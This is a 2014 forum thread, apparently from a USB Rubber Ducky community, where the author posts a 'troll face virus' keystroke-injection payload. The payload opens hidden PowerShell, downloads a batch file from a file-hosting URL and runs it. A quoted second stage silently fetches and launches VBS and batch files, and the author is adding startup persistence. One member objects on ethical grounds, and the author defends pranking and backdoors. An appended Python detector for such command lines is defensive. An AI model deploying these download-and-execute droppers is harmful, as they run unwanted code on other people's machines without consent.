Haxineer1337 Posted January 16, 2014 (edited)

[Told you it was coming soon...]
[BROKEN AS OF NOW, MEDIAFIRE HATES ME]

TROLL FACE VIRUS PAYLOAD:

[What it does]: Runs powershell to wget and execute a bat file that wgets and executes the requirements [HIDDEN]
Every 60 seconds it loads up your browser if not already opened and opens a troll face.
The only way to remove it is to go to task manager and end cmd.exe and timeout.exe.
Works on windows 7, replace CONTROL ESCAPE with GUI r for it to work with windows 8 and 7.
Working on startup persistence

SCRIPT:

    DELAY 20000
    CONTROL ESCAPE
    DELAY 1100
    STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat','C:\windowstp.bat'); Start-Process "C:\windowstp.bat"
    ENTER

Edited January 17, 2014 by Haxineer1337

Xcellerator Posted January 16, 2014

This is just malicious and all it would do is take up some poor admin's time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demonstration, not causing harm to them or interrupting their work flow - that doesn't help anyone.

Haxineer1337 (Author) Posted January 16, 2014

> This is just malicious and all it would do is take up some poor admin's time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demonstration, not causing harm to them or interrupting their work flow - that doesn't help anyone.

Then what's the point of having a ducky if you are using it for "demonstration"? I paid 50 dollars for something that makes me laugh, not "demonstrate".

overwraith Posted January 16, 2014

Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts.

Xcellerator Posted January 16, 2014 (edited)

> Then what's the point of having a ducky if you are using it for "demonstration"? I paid 50 dollars for something that makes me laugh, not "demonstrate".

By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as a way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others.

Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page..

> Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts.

I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. It's what the script does that's the problem. Changing someone's wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..

Edited January 16, 2014 by Xcellerator

Haxineer1337 (Author) Posted January 17, 2014 (edited)

> By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as a way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others.
>
> Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page..
>
> I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. It's what the script does that's the problem. Changing someone's wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..

@xcell You obviously haven't tested it either [or been to preschool for that matter], because that, my friend, is a direct download link. It has been fully tested and works 100%. Good day, sir.

PS: Do you really think that pop ups are more dangerous than a backdoor? Back doors let you take full control of their computer. You can delete files, use their webcam, open 100s of web pages, etc.. That interrupts their work flow even more than a pop up powershell that's easy to get rid of.

Edited January 17, 2014 by Haxineer1337

Xcellerator Posted January 17, 2014 (edited)

How about you try:

    wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat

and then tell me it works.

I see no reason for you to be offensive (the preschool remark), I've merely given my opinion that I think what you're doing is immoral and not in vein with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever).

Mediafire don't allow direct downloads via links, they want you to go to their site and click the link manually which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth.

A better idea would be stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files you're downloading). I wrote a ducky script using this technique to add an open wifi network to a windows machine (to autoconnect to the pineapple). You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST)

Backdoors can be used as a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway..

Edited January 17, 2014 by Xcellerator

Haxineer1337 (Author) Posted January 17, 2014

Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button led you to. I've tested it on another computer and it's worked.

overwraith Posted January 17, 2014

Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it.

Xcellerator Posted January 17, 2014

> Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button led you to. I've tested it on another computer and it's worked.

Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file?

> Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it.

    @echo off
    powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs')
    powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat')
    powershell -windowstyle hidden Start-Process "C:\updater.vbs"

This is what the initial bat file is when you download it through mediafire.

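
Added example, not part of any post in this thread: the command lines quoted above share a shape a defender can look for in process-creation logs, namely hidden-window PowerShell, a WebClient.DownloadFile call that writes a script file, and Start-Process on that file. The Python sketch below scores command lines on those three traits; the weights, the threshold, the function names and the `files.example.invalid` host are assumptions made for illustration.

```python
import re

# powershell.exe accepts any unambiguous prefix of -WindowStyle (-w, -win, ...).
HIDDEN = re.compile(r"-(w[a-z]*)\s+hidden\b", re.I)
DOWNLOAD = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
START = re.compile(r"Start-Process\s+[\"']?([^\"';\s]+)", re.I)
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")


def analyze(cmdline):
    """Score one process command line; returns a dict of what was found."""
    result = {"hidden": False, "downloads": [], "started": [], "score": 0}
    if "powershell" not in cmdline.lower():
        return result
    result["hidden"] = any("windowstyle".startswith(m.group(1).lower())
                           for m in HIDDEN.finditer(cmdline))
    result["downloads"] = DOWNLOAD.findall(cmdline)   # (url, destination) pairs
    result["started"] = START.findall(cmdline)
    dests = {d.lower() for _, d in result["downloads"]}
    score = 1 if result["hidden"] else 0
    # A script file fetched from the network and written to disk.
    score += sum(2 for d in dests if d.endswith(SCRIPT_EXT))
    # Running the file that was just written is download-and-execute.
    score += sum(3 for s in result["started"] if s.lower() in dests)
    # A script launched from a hidden window (the later stage in the thread).
    if result["hidden"] and any(s.lower().endswith(SCRIPT_EXT)
                                for s in result["started"]):
        score += 2
    result["score"] = score
    return result


def triage(cmdlines, threshold=3):
    """Return (score, cmdline) pairs at or above threshold, highest first."""
    hits = [(analyze(c)["score"], c) for c in cmdlines]
    return sorted((h for h in hits if h[0] >= threshold), reverse=True)


# Constructed sample command lines (placeholder host, not real telemetry).
SAMPLE = [
    "powershell -windowstyle hidden (new-object System.Net.WebClient)"
    ".DownloadFile('http://files.example.invalid/Runner1.bat','C:\\windowstp.bat');"
    " Start-Process \"C:\\windowstp.bat\"",
    "powershell -w hidden (new-object System.Net.WebClient)"
    ".DownloadFile('http://files.example.invalid/updater.vbs','C:\\updater.vbs')",
    "powershell -windowstyle hidden Start-Process \"C:\\updater.vbs\"",
    "powershell -NoProfile Get-ChildItem C:\\Users",
    "cmd.exe /c timeout 60",
]
```

Calling `triage(SAMPLE)` returns the three suspicious lines with the combined download-and-execute line ranked first; in practice the input would be the command-line field of process-creation events.
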
Haxineer1337 (Author) Posted January 17, 2014

> Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file?
>
>     @echo off
>     powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs')
>     powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat')
>     powershell -windowstyle hidden Start-Process "C:\updater.vbs"
>
> This is what the initial bat file is when you download it through mediafire.

Ok. I will provide screenshots soon.

overwraith Posted January 17, 2014 (edited)

Actually there is a code box built into the forums here, looks like a little button with a greater than less than symbol <>. Smack in the center of the buttons at the top of the form. So you can just paste text into it.

Edited January 17, 2014 by overwraith